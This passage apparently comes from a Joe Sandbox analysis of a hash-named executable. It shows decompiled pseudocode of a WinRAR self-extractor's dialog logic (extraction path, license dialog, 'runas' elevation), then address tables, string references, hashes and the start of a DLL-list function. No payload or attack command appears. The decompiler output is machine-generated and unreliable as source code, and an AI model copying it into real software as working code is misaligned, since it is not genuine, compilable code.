					__eflags = _t308;
					if(__eflags == 0) {
						_push(_t304);
						E0101CD2E(_t287, _t301, __eflags, __fp0);
						_t105 =  *0x104c574;
						_t279 = 1;
						 *0x104844c = _t304;
						 *0x1048458 = _t304;
						__eflags = _t105;
						if(_t105 != 0) {
							SendMessageW(_t304, 0x80, 1, _t105); // executed
						}
						_t106 =  *0x1056b7c;
						__eflags = _t106;
						if(_t106 != 0) {
							SendDlgItemMessageW(_t304, 0x6c, 0x172, 0, _t106); // executed
						}
						_t107 = GetDlgItem(_t304, 0x68);
						 *(_t320 - 0x14) = _t107;
						SendMessageW(_t107, 0x435, 0, 0x400000);
						E01019DA4(_t320 - 0x1174, 0x800);
						_t111 = GetDlgItem(_t304, 0x66);
						__eflags =  *0x104a472;
						_t309 = _t111;
						 *(_t320 - 0x18) = _t309;
						_t288 = 0x104a472;
						if( *0x104a472 == 0) {
							_t288 = _t320 - 0x1174;
						}
						SetWindowTextW(_t309, _t288);
						E0101A2C7(_t309); // executed
						_push(0x104843c);
						_push(0x1048438);
						_push("C:\Users\jones\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe");
						_push(_t304);
						 *0x1048463 = 0; // executed
						_t114 = E0101A7C3(_t288, _t301, __eflags); // executed
						__eflags = _t114;
						if(_t114 == 0) {
							 *0x1048452 = _t279;
						}
						__eflags =  *0x104843c;
						if( *0x104843c > 0) {
							_push(7);
							_push( *0x1048438);
							_push(_t304);
							E0101BDF5(_t301);
						}
						__eflags =  *0x105ec98;
						if( *0x105ec98 == 0) {
							SetDlgItemTextW(_t304, 0x6b, E0100DDD1(_t288, 0xbf));
							SetDlgItemTextW(_t304, _t279, E0100DDD1(_t288, 0xbe));
						}
						__eflags =  *0x104843c;
						if( *0x104843c <= 0) {
							L103:
							__eflags =  *0x1048463;
							if( *0x1048463 != 0) {
								L114:
								__eflags =  *0x104a46c - 2;
								if( *0x104a46c == 2) {
									EnableWindow(_t309, 0);
								}
								__eflags =  *0x1049468;
								if( *0x1049468 != 0) {
									E010012C8(_t304, 0x67, 0);
									E010012C8(_t304, 0x66, 0);
								}
								_t115 =  *0x104a46c;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags =  *0x1048450;
									if( *0x1048450 == 0) {
										_push(0);
										_push(_t279);
										_push(0x111);
										_push(_t304);
										__eflags = _t115 - _t279;
										if(_t115 != _t279) {
											 *0x10620a4();
										} else {
											SendMessageW(); // executed
										}
									}
								}
								__eflags =  *0x1048452;
								if( *0x1048452 != 0) {
									SetDlgItemTextW(_t304, _t279, E0100DDD1(_t288, 0x90));
								}
								goto L125;
							}
							__eflags =  *0x105dc84;
							if( *0x105dc84 != 0) {
								goto L114;
							}
							__eflags =  *0x104a46c;
							if( *0x104a46c != 0) {
								goto L114;
							}
							__eflags = 0;
							_t311 = 0xaa;
							 *((short*)(_t320 - 0x969c)) = 0;
							do {
								__eflags = _t311 - 0xaa;
								if(_t311 != 0xaa) {
									L109:
									__eflags = _t311 - 0xab;
									if(__eflags != 0) {
										L111:
										E0100FE2E(__eflags, _t320 - 0x969c, " ", 0x2000);
										E0100FE2E(__eflags, _t320 - 0x969c, E0100DDD1(_t288, _t311), 0x2000);
										goto L112;
									}
									__eflags =  *0x105ec98;
									if(__eflags != 0) {
										goto L112;
									}
									goto L111;
								}
								__eflags =  *0x105ec98;
								if( *0x105ec98 == 0) {
									goto L112;
								}
								goto L109;
								L112:
								_t311 = _t311 + 1;
								__eflags = _t311 - 0xb0;
							} while (__eflags <= 0);
							_t288 =  *0x1048440; // 0x0
							E01019635(_t288, __eflags,  *0x1040ed4,  *(_t320 - 0x14), _t320 - 0x969c, 0, 0);
							_t309 =  *(_t320 - 0x18);
							goto L114;
						} else {
							_push(0);
							_push( *0x1048438);
							_push(_t304); // executed
							E0101BDF5(_t301);
							_t133 =  *0x105dc84; // 0x0
							__eflags = _t133;
							if(_t133 != 0) {
								__eflags =  *0x104a46c;
								if(__eflags == 0) {
									_t290 =  *0x1048440; // 0x0
									E01019635(_t290, __eflags,  *0x1040ed4,  *(_t320 - 0x14), _t133, 0, 0);
									L010235CE( *0x105dc84);
									_pop(_t288);
								}
							}
							__eflags =  *0x104a46c - _t279;
							if( *0x104a46c == _t279) {
								L102:
								_push(_t279);
								_push( *0x1048438);
								_push(_t304);
								E0101BDF5(_t301);
								goto L103;
							} else {
								 *0x10620c4(_t304);
								__eflags =  *0x104a46c - _t279;
								if( *0x104a46c == _t279) {
									goto L102;
								}
								__eflags =  *0x104a471;
								if( *0x104a471 != 0) {
									goto L102;
								}
								_push(3);
								_push( *0x1048438);
								_push(_t304);
								E0101BDF5(_t301);
								__eflags =  *0x105ec90;
								if( *0x105ec90 == 0) {
									goto L102;
								}
								_t137 = DialogBoxParamW( *0x1040ed4, L"LICENSEDLG", 0, E0101ACD0, 0);
								__eflags = _t137;
								if(_t137 == 0) {
									L25:
									 *0x1048450 = _t279;
									L26:
									_push(_t279);
									L13:
									EndDialog(_t304, ??); // executed
									L125:
									_t116 = _t279;
									L126:
									 *[fs:0x0] =  *((intOrPtr*)(_t320 - 0xc));
									return _t116;
								}
								goto L102;
							}
						}
					}
					__eflags = _t308 != 1;
					if(_t308 != 1) {
						L7:
						_t116 = 0;
						goto L126;
					}
					_t149 = (_t277 & 0x0000ffff) - 1;
					__eflags = _t149;
					if(_t149 == 0) {
						__eflags =  *0x1048451;
						if( *0x1048451 != 0) {
							L23:
							GetDlgItemTextW(_t304, 0x66, _t320 - 0x2174, 0x800);
							__eflags =  *0x1048451;
							if( *0x1048451 == 0) {
								__eflags =  *0x1048452;
								if( *0x1048452 == 0) {
									_t313 = GetDlgItem(_t304, 0x68);
									__eflags =  *0x104845c; // 0x0
									if(__eflags == 0) {
										SendMessageW(_t313, 0xb1, 0, 0xffffffff);
										SendMessageW(_t313, 0xc2, 0, 0x10335b4);
									}
									SetFocus(_t313);
									__eflags =  *0x1049468;
									if( *0x1049468 == 0) {
										_t314 = 0x800;
										E0100FE56(_t320 - 0x1174, _t320 - 0x2174, 0x800);
										E0101CAD9(_t287, _t320 - 0x1174, 0x800);
										E0100400A(_t320 - 0x429c, 0x880, E0100DDD1(_t287, 0xb9), _t320 - 0x1174);
										_t322 = _t322 + 0x10;
										_push(_t320 - 0x429c);
										_push(0);
										E0101CB5A();
									} else {
										_push(E0100DDD1(_t287, 0xba));
										_push(0);
										E0101CB5A();
										_t314 = 0x800;
									}
									__eflags =  *0x104a471;
									if( *0x104a471 == 0) {
										E0101D1F2(_t320 - 0x2174);
									}
									_push(0);
									_push(_t320 - 0x2174);
									 *(_t320 - 0xe) = 0;
									_t166 = E0100A04F(0, _t320);
									_t279 = 1;
									__eflags = _t166;
									if(_t166 != 0) {
										L40:
										_t302 = E0101A322(_t320 - 0x2174);
										 *(_t320 - 0xd) = _t302;
										__eflags = _t302;
										if(_t302 != 0) {
											L43:
											_t169 =  *(_t320 - 0xe);
											L44:
											_t287 =  *0x104a471;
											__eflags = _t287;
											if(_t287 != 0) {
												L50:
												__eflags =  *(_t320 - 0xd);
												if( *(_t320 - 0xd) != 0) {
													 *0x1048454 = _t279;
													E010012E6(_t304, 0x67, 0);
													E010012E6(_t304, 0x66, 0);
													SetDlgItemTextW(_t304, _t279, E0100DDD1(_t287, 0xe6)); // executed
													E010012E6(_t304, 0x69, _t279);
													SetDlgItemTextW(_t304, 0x65, 0x10335b4); // executed
													_t315 = GetDlgItem(_t304, 0x65);
													__eflags = _t315;
													if(_t315 != 0) {
														_t195 = GetWindowLongW(_t315, 0xfffffff0) | 0x00000080;
														__eflags = _t195;
														SetWindowLongW(_t315, 0xfffffff0, _t195);
													}
													_push(5);
													_push( *0x1048438);
													_push(_t304);
													E0101BDF5(_t302);
													_push(2);
													_push( *0x1048438);
													_push(_t304);
													E0101BDF5(_t302);
													_push("C:\Users\jones\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe");
													_push(_t304);
													 *0x1060cb4 = _t279; // executed
													E0101D0F5(_t287, __eflags); // executed
													_push(6);
													_push( *0x1048438);
													 *0x1060cb4 = 0;
													_push(_t304);
													E0101BDF5(_t302);
													__eflags =  *0x1048450;
													if( *0x1048450 == 0) {
														__eflags =  *0x104845c;
														if( *0x104845c == 0) {
															__eflags =  *0x105eca4;
															if( *0x105eca4 == 0) {
																_push(4);
																_push( *0x1048438);
																_push(_t304); // executed
																E0101BDF5(_t302); // executed
															}
														}
													}
													E010012C8(_t304, _t279, _t279);
													 *0x1048454 =  *0x1048454 & 0x00000000;
													__eflags =  *0x1048454;
													_t182 =  *0x1048450; // 0x1
													goto L75;
												}
												__eflags = _t287;
												_t169 = (_t169 & 0xffffff00 | _t287 != 0x00000000) - 0x00000001 &  *(_t320 - 0xe);
												__eflags = _t169;
												L52:
												__eflags = _t169;
												 *(_t320 - 0xd) = _t169 == 0;
												__eflags = _t169;
												if(_t169 == 0) {
													L66:
													__eflags =  *(_t320 - 0xd);
													if( *(_t320 - 0xd) != 0) {
														_push(E0100DDD1(_t287, 0x9a));
														E0100400A(_t320 - 0x569c, 0xa00, L"\"%s\"\n%s", _t320 - 0x2174);
														E01006FC6(0x1040f50, _t279);
														E01019F35(_t304, _t320 - 0x569c, E0100DDD1(0x1040f50, 0x96), 0x30);
														 *0x104845c =  *0x104845c + 1;
													}
													L12:
													_push(0);
													goto L13;
												}
												GetModuleFileNameW(0, _t320 - 0x1174, _t314);
												_t287 = 0x104c472;
												E0100EB3A(0x104c472, _t320 - 0x174, 0x80);
												_push(0x104b472);
												E0100400A(_t320 - 0x11cb4, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t320 - 0x2174);
												_t322 = _t322 + 0x14;
												 *(_t320 - 0x58) = 0x3c;
												 *((intOrPtr*)(_t320 - 0x54)) = 0x40;
												 *((intOrPtr*)(_t320 - 0x48)) = _t320 - 0x1174;
												 *((intOrPtr*)(_t320 - 0x44)) = _t320 - 0x11cb4;
												 *(_t320 - 0x50) = _t304;
												 *((intOrPtr*)(_t320 - 0x4c)) = L"runas";
												 *(_t320 - 0x3c) = _t279;
												 *((intOrPtr*)(_t320 - 0x38)) = 0;
												 *((intOrPtr*)(_t320 - 0x40)) = 0x1048468;
												_t317 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
												 *(_t320 - 0x14) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													 *(_t320 - 0x1c) =  *(_t320 - 0x14);
												} else {
													 *0x1056b80 = 0;
													_t231 = GetCommandLineW();
													__eflags = _t231;
													if(_t231 != 0) {
														E0100FE56(0x1056b82, _t231, 0x2000);
													}
													E0101AB2E(_t287, 0x105ab82, 7);
													E0101AB2E(_t287, 0x105bb82, 2);
													E0101AB2E(_t287, 0x105cb82, 0x10);
													 *0x105dc83 = _t279;
													_t287 = 0x105db82;
													E0100ECAD(_t279, 0x105db82, _t320 - 0x174);
													 *(_t320 - 0x1c) = MapViewOfFile(_t317, 2, 0, 0, 0);
													E0101F4B0(_t238, 0x1056b80, 0x7104);
													_t322 = _t322 + 0xc;
												}
												_t220 = ShellExecuteExW(_t320 - 0x58);
												E0100ECF8(_t320 - 0x174, 0x80);
												E0100ECF8(_t320 - 0x11cb4, 0x430c);
												__eflags = _t220;
												if(_t220 == 0) {
													_t319 =  *(_t320 - 0x1c);
													 *(_t320 - 0xd) = _t279;
													goto L64;
												} else {
													 *0x10620a8( *(_t320 - 0x20), 0x2710);
													_t71 = _t320 - 0x18;
													 *_t71 =  *(_t320 - 0x18) & 0x00000000;
													__eflags =  *_t71;
													_t319 =  *(_t320 - 0x1c);
													while(1) {
														__eflags =  *_t319;
														if( *_t319 != 0) {
															break;
														}
														Sleep(0x64);
														_t230 =  *(_t320 - 0x18) + 1;
														 *(_t320 - 0x18) = _t230;
														__eflags = _t230 - 0x64;
														if(_t230 < 0x64) {
															continue;
														}
														break;
													}
													 *0x105eca4 =  *(_t320 - 0x20);
													L64:
													__eflags =  *(_t320 - 0x14);
													if( *(_t320 - 0x14) != 0) {
														UnmapViewOfFile(_t319);
														CloseHandle( *(_t320 - 0x14));
													}
													goto L66;
												}
											}
											__eflags = _t302;
											if(_t302 == 0) {
												goto L52;
											}
											E0100400A(_t320 - 0x1174, _t314, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
											_t322 = _t322 + 0x10;
											E01009619(_t320 - 0x319c);
											 *(_t320 - 4) =  *(_t320 - 4) & 0x00000000;
											_push(0x11);
											_push(_t320 - 0x1174);
											_t246 = E0100971E(_t320 - 0x319c);
											 *(_t320 - 0xd) = _t246;
											__eflags = _t246;
											if(_t246 == 0) {
												_t247 = GetLastError();
												__eflags = _t247 - 5;
												if(_t247 == 5) {
													 *(_t320 - 0xe) = _t279;
												}
											}
											_t39 = _t320 - 4;
											 *_t39 =  *(_t320 - 4) | 0xffffffff;
											__eflags =  *_t39;
											_t169 = E01009653(_t320 - 0x319c, _t314); // executed
											_t287 =  *0x104a471;
											goto L50;
										}
										_t248 = GetLastError();
										_t302 =  *(_t320 - 0xd);
										__eflags = _t248 - 5;
										if(_t248 != 5) {
											goto L43;
										}
										_t169 = _t279;
										 *(_t320 - 0xe) = _t169;
										goto L44;
									} else {
										_t249 = GetLastError();
										__eflags = _t249 - 5;
										if(_t249 == 5) {
											L39:
											 *(_t320 - 0xe) = _t279;
											goto L40;
										}
										__eflags = _t249 - 3;
										if(_t249 != 3) {
											goto L40;
										}
										goto L39;
									}
								} else {
									_t279 = 1;
									_t182 = 1;
									 *0x1048450 = 1;
									L75:
									__eflags =  *0x104845c;
									if( *0x104845c <= 0) {
										goto L26;
									}
									__eflags = _t182;
									if(_t182 != 0) {
										goto L26;
									}
									 *0x1048451 = _t279;
									SetDlgItemTextW(_t304, _t279, E0100DDD1(_t287, 0x90));
									_t292 =  *0x1040f50; // 0x0
									__eflags = _t292 - 9;
									if(_t292 != 9) {
										__eflags = _t292 - 3;
										_t189 = ((0 | _t292 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
										__eflags = _t189;
										 *(_t320 - 0x14) = _t189;
										_t316 = _t189;
									} else {
										_t316 = 0xa0;
									}
									_t190 = E0100DDD1(_t292, 0x96);
									E01019F35(_t304, E0100DDD1(_t292, _t316), _t190, 0x30);
									goto L125;
								}
							}
							_t279 = 1;
							__eflags =  *0x1048452;
							if( *0x1048452 == 0) {
								goto L26;
							}
							goto L25;
						}
						__eflags =  *0x1060cb4;
						if( *0x1060cb4 == 0) {
							goto L23;
						} else {
							__eflags =  *0x1060cb5;
							_t256 = _t149 & 0xffffff00 |  *0x1060cb5 == 0x00000000;
							__eflags = _t256;
							 *0x1060cb5 = _t256;
							_t257 = E0100DDD1((0 | _t256 != 0x00000000) + 0xe6, (0 | _t256 != 0x00000000) + 0xe6);
							_t279 = 1;
							SetDlgItemTextW(_t304, 1, _t257);
							while(1) {
								__eflags =  *0x1060cb5;
								if( *0x1060cb5 == 0) {
									goto L125;
								}
								__eflags =  *0x1048450;
								if( *0x1048450 != 0) {
									goto L125;
								}
								_t261 = GetMessageW(_t320 - 0x74, 0, 0, 0);
								__eflags = _t261;
								if(_t261 == 0) {
									goto L125;
								} else {
									_t263 = IsDialogMessageW(_t304, _t320 - 0x74);
									__eflags = _t263;
									if(_t263 == 0) {
										TranslateMessage(_t320 - 0x74);
										DispatchMessageW(_t320 - 0x74);
									}
									continue;
								}
							}
							goto L125;
						}
					}
					_t268 = _t149 - 1;
					__eflags = _t268;
					if(_t268 == 0) {
						_t279 = 1;
						__eflags =  *0x1048454;
						 *0x1048450 = 1;
						if( *0x1048454 == 0) {
							goto L12;
						}
						__eflags =  *0x104845c;
						if( *0x104845c != 0) {
							goto L125;
						}
						goto L12;
					}
					__eflags = _t268 == 0x65;
					if(_t268 == 0x65) {
						_t272 = E01001241(_t304, E0100DDD1(_t287, 0x64), _t320 - 0x1174);
						__eflags = _t272;
						if(_t272 != 0) {
							SetDlgItemTextW(_t304, 0x66, _t320 - 0x1174);
						}
						goto L1;
					}
					goto L7;
				}
				L1:
				_t116 = 1;
				goto L126;
			}

0x0101aee0
0x0101aee0
0x0101aee5
0x0101aeef
0x0101aef5
0x0101aef9
0x0101aefd
0x0101af16
0x0101af20
0x0101af20
0x0101af26
0x0101b5cb
0x0101b5cc
0x0101b5d1
0x0101b5d8
0x0101b5d9
0x0101b5df
0x0101b5e5
0x0101b5e7
0x0101b5f1
0x0101b5f1
0x0101b5f7
0x0101b5fc
0x0101b5fe
0x0101b60b
0x0101b60b
0x0101b614
0x0101b627
0x0101b62a
0x0101b63c
0x0101b644
0x0101b64a
0x0101b652
0x0101b654
0x0101b657
0x0101b65c
0x0101b65e
0x0101b65e
0x0101b666
0x0101b66d
0x0101b672
0x0101b677
0x0101b67c
0x0101b681
0x0101b682
0x0101b689
0x0101b68e
0x0101b690
0x0101b692
0x0101b692
0x0101b698
0x0101b69f
0x0101b6a1
0x0101b6a3
0x0101b6a9
0x0101b6aa
0x0101b6aa
0x0101b6af
0x0101b6b6
0x0101b6c6
0x0101b6d9
0x0101b6d9
0x0101b6df
0x0101b6e6
0x0101b797
0x0101b797
0x0101b79e
0x0101b847
0x0101b847
0x0101b84e
0x0101b853
0x0101b853
0x0101b859
0x0101b860
0x0101b867
0x0101b871
0x0101b871
0x0101b876
0x0101b87b
0x0101b87d
0x0101b87f
0x0101b886
0x0101b888
0x0101b88a
0x0101b88b
0x0101b890
0x0101b891
0x0101b893
0x0101b89d
0x0101b895
0x0101b895
0x0101b895
0x0101b893
0x0101b886
0x0101b8a3
0x0101b8aa
0x0101b8b9
0x0101b8b9
0x00000000
0x0101b8aa
0x0101b7a4
0x0101b7ab
0x00000000
0x00000000
0x0101b7b1
0x0101b7b8
0x00000000
0x00000000
0x0101b7be
0x0101b7c0
0x0101b7c5
0x0101b7cc
0x0101b7cc
0x0101b7d2
0x0101b7dd
0x0101b7dd
0x0101b7e3
0x0101b7ee
0x0101b7ff
0x0101b817
0x00000000
0x0101b817
0x0101b7e5
0x0101b7ec
0x00000000
0x00000000
0x00000000
0x0101b7ec
0x0101b7d4
0x0101b7db
0x00000000
0x00000000
0x00000000
0x0101b81c
0x0101b81c
0x0101b81d
0x0101b81d
0x0101b825
0x0101b83f
0x0101b844
0x00000000
0x0101b6ec
0x0101b6ec
0x0101b6ee
0x0101b6f4
0x0101b6f5
0x0101b6fa
0x0101b6ff
0x0101b701
0x0101b703
0x0101b70a
0x0101b70c
0x0101b720
0x0101b72b
0x0101b730
0x0101b730
0x0101b70a
0x0101b731
0x0101b737
0x0101b78a
0x0101b78a
0x0101b78b
0x0101b791
0x0101b792
0x00000000
0x0101b739
0x0101b73a
0x0101b740
0x0101b746
0x00000000
0x00000000
0x0101b748
0x0101b74f
0x00000000
0x00000000
0x0101b751
0x0101b753
0x0101b759
0x0101b75a
0x0101b75f
0x0101b766
0x00000000
0x00000000
0x0101b77c
0x0101b782
0x0101b784
0x0101b06b
0x0101b06b
0x0101b071
0x0101b071
0x0101af96
0x0101af97
0x0101b8bf
0x0101b8bf
0x0101b8c1
0x0101b8c7
0x0101b8d1
0x0101b8d1
0x00000000
0x0101b784
0x0101b737
0x0101b6e6
0x0101af2c
0x0101af2f
0x0101af43
0x0101af43
0x00000000
0x0101af43
0x0101af34
0x0101af34
0x0101af37
0x0101afa2
0x0101afa9
0x0101b041
0x0101b050
0x0101b056
0x0101b05d
0x0101b077
0x0101b07e
0x0101b09a
0x0101b09c
0x0101b0a2
0x0101b0ad
0x0101b0bf
0x0101b0bf
0x0101b0c6
0x0101b0cc
0x0101b0d3
0x0101b0ed
0x0101b101
0x0101b10e
0x0101b131
0x0101b136
0x0101b13f
0x0101b140
0x0101b141
0x0101b0d5
0x0101b0df
0x0101b0e0
0x0101b0e1
0x0101b0e6
0x0101b0e6
0x0101b146
0x0101b14d
0x0101b156
0x0101b156
0x0101b15b
0x0101b164
0x0101b165
0x0101b168
0x0101b16f
0x0101b170
0x0101b172
0x0101b189
0x0101b195
0x0101b197
0x0101b19a
0x0101b19c
0x0101b1b3
0x0101b1b3
0x0101b1b6
0x0101b1b6
0x0101b1bc
0x0101b1be
0x0101b22d
0x0101b22d
0x0101b231
0x0101b471
0x0101b477
0x0101b481
0x0101b493
0x0101b49d
0x0101b4aa
0x0101b4b9
0x0101b4bb
0x0101b4bd
0x0101b4c8
0x0101b4c8
0x0101b4d1
0x0101b4d1
0x0101b4d7
0x0101b4d9
0x0101b4df
0x0101b4e0
0x0101b4e5
0x0101b4e7
0x0101b4ed
0x0101b4ee
0x0101b4f3
0x0101b4f8
0x0101b4f9
0x0101b4ff
0x0101b504
0x0101b506
0x0101b50c
0x0101b513
0x0101b514
0x0101b519
0x0101b520
0x0101b522
0x0101b529
0x0101b52b
0x0101b532
0x0101b534
0x0101b536
0x0101b53c
0x0101b53d
0x0101b53d
0x0101b532
0x0101b529
0x0101b545
0x0101b54a
0x0101b54a
0x0101b551
0x00000000
0x0101b551
0x0101b237
0x0101b23e
0x0101b23e
0x0101b241
0x0101b241
0x0101b243
0x0101b247
0x0101b249
0x0101b407
0x0101b407
0x0101b40b
0x0101b41b
0x0101b434
0x0101b442
0x0101b45c
0x0101b461
0x0101b461
0x0101af94
0x0101af94
0x00000000
0x0101af94
0x0101b259
0x0101b26a
0x0101b270
0x0101b275
0x0101b292
0x0101b297
0x0101b29a
0x0101b2a7
0x0101b2ae
0x0101b2b7
0x0101b2cf
0x0101b2d2
0x0101b2d9
0x0101b2dc
0x0101b2df
0x0101b2ec
0x0101b2ee
0x0101b2f1
0x0101b2f3
0x0101b37e
0x0101b2f9
0x0101b2f9
0x0101b300
0x0101b306
0x0101b308
0x0101b315
0x0101b315
0x0101b321
0x0101b32d
0x0101b339
0x0101b344
0x0101b34b
0x0101b350
0x0101b36e
0x0101b371
0x0101b376
0x0101b376
0x0101b385
0x0101b399
0x0101b3aa
0x0101b3af
0x0101b3b1
0x0101b3eb
0x0101b3ee
0x00000000
0x0101b3b3
0x0101b3bb
0x0101b3c1
0x0101b3c1
0x0101b3c1
0x0101b3c5
0x0101b3c8
0x0101b3c8
0x0101b3cb
0x00000000
0x00000000
0x0101b3cf
0x0101b3d8
0x0101b3d9
0x0101b3dc
0x0101b3df
0x00000000
0x00000000
0x00000000
0x0101b3df
0x0101b3e4
0x0101b3f1
0x0101b3f1
0x0101b3f5
0x0101b3f8
0x0101b401
0x0101b401
0x00000000
0x0101b3f5
0x0101b3b1
0x0101b1c0
0x0101b1c2
0x00000000
0x00000000
0x0101b1d8
0x0101b1dd
0x0101b1e6
0x0101b1eb
0x0101b1f5
0x0101b1f7
0x0101b1fe
0x0101b203
0x0101b206
0x0101b208
0x0101b20a
0x0101b210
0x0101b213
0x0101b215
0x0101b215
0x0101b213
0x0101b218
0x0101b218
0x0101b218
0x0101b222
0x0101b227
0x00000000
0x0101b227
0x0101b19e
0x0101b1a4
0x0101b1a7
0x0101b1aa
0x00000000
0x00000000
0x0101b1ac
0x0101b1ae
0x00000000
0x0101b174
0x0101b174
0x0101b17a
0x0101b17d
0x0101b184
0x0101b186
0x00000000
0x0101b186
0x0101b17f
0x0101b182
0x00000000
0x00000000
0x00000000
0x0101b182
0x0101b080
0x0101b082
0x0101b083
0x0101b085
0x0101b556
0x0101b556
0x0101b55d
0x00000000
0x00000000
0x0101b563
0x0101b565
0x00000000
0x00000000
0x0101b570
0x0101b57e
0x0101b584
0x0101b58a
0x0101b58d
0x0101b598
0x0101b5a2
0x0101b5a2
0x0101b5a7
0x0101b5aa
0x0101b58f
0x0101b58f
0x0101b58f
0x0101b5b3
0x0101b5c1
0x00000000
0x0101b5c1
0x0101b07e
0x0101b061
0x0101b062
0x0101b069
0x00000000
0x00000000
0x00000000
0x0101b069
0x0101afaf
0x0101afb6
0x00000000
0x0101afbc
0x0101afbc
0x0101afc3
0x0101afc8
0x0101afca
0x0101afd9
0x0101afe1
0x0101afe4
0x0101b033
0x0101b033
0x0101b03a
0x0101b03c
0x0101b03c
0x0101afec
0x0101aff3
0x00000000
0x00000000
0x0101b002
0x0101b008
0x0101b00a
0x00000000
0x0101b010
0x0101b015
0x0101b01b
0x0101b01d
0x0101b023
0x0101b02d
0x0101b02d
0x00000000
0x0101b01d
0x0101b00a
0x00000000
0x0101b033
0x0101afb6
0x0101af39
0x0101af39
0x0101af3c
0x0101af77
0x0101af78
0x0101af7f
0x0101af85
0x00000000
0x00000000
0x0101af87
0x0101af8e
0x00000000
0x00000000
0x00000000
0x0101af8e
0x0101af3e
0x0101af41
0x0101af5a
0x0101af5f
0x0101af61
0x0101af6d
0x0101af6d
0x00000000
0x0101af61
0x00000000
0x0101af41
0x0101af18
0x0101af1a
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0101AEE5

Part of subcall function 0100130B: GetDlgItem.USER32(00000000,00003021), ref: 0100134F
Part of subcall function 0100130B: SetWindowTextW.USER32(00000000,010335B4), ref: 01001365

Strings

STARTDLG, xrefs: 0101AF04
@, xrefs: 0101B2A7
<, xrefs: 0101B29A
__tmp_rar_sfx_access_check_%u, xrefs: 0101B1CB
winrarsfxmappingfile.tmp, xrefs: 0101B2BC
"%s"%s, xrefs: 0101B423
LICENSEDLG, xrefs: 0101B771
C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, xrefs: 0101B4F3, 0101B67C
-el -s2 "-d%s" "-sp%s", xrefs: 0101B281
C:\Users\user\Desktop, xrefs: 0101B2DF

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-183264151
Opcode ID: 7dfe3738aebaef146e1814fd71156dfa36e2581485e6c0ea40e0af1f272b5c01
Instruction ID: b96b8787a8cdc3de6095c1c3514c5454e60345be4d3f7718919e86cedff10207
Opcode Fuzzy Hash: 7dfe3738aebaef146e1814fd71156dfa36e2581485e6c0ea40e0af1f272b5c01
Instruction Fuzzy Hash: AD42E7B4944245BFFB32ABA49D89FEE7BBCAB51704F004499F6C1A60C9CB7E4544CB21

Uniqueness

Uniqueness Score: -1.00%

Function 010100CF, Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E010100CF(void* __edx, CHAR* _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, char _a244, char _a248, short _a752, short _a756, char _a764, short _a768, char _a4844, char _a4848, void _a4856, char _a4860, short _a4864, char _a9148, char _a9156, void _a13256, signed char _a46028) {
				long _v0;
				long _v8;
				char* _t115;
				void* _t123;
				int _t127;
				long _t138;
				int _t164;
				_Unknown_base(*)()* _t173;
				signed char _t180;
				intOrPtr _t194;
				long _t196;
				void* _t197;
				_Unknown_base(*)()* _t198;
				struct HINSTANCE__* _t200;
				signed int _t202;
				signed int _t204;
				void* _t205;
				_Unknown_base(*)()* _t206;
				signed int _t207;
				int _t208;
				void* _t210;

				E0101E360();
				_push(_t207);
				_t180 = 0;
				_t200 = GetModuleHandleW(L"kernel32");
				if(_t200 == 0) {
					L5:
					_t115 =  *0x103e080; // 0x1033b54
					_t208 = _t207 | 0xffffffff;
					_a4 = L"version.dll";
					_t201 = 0x800;
					_a8 = L"DXGIDebug.dll";
					_a12 = L"sfc_os.dll";
					_a16 = L"SSPICLI.DLL";
					_a20 = L"rsaenh.dll";
					_a24 = L"UXTheme.dll";
					_a28 = L"dwmapi.dll";
					_a32 = L"cryptbase.dll";
					_a36 = L"lpk.dll";
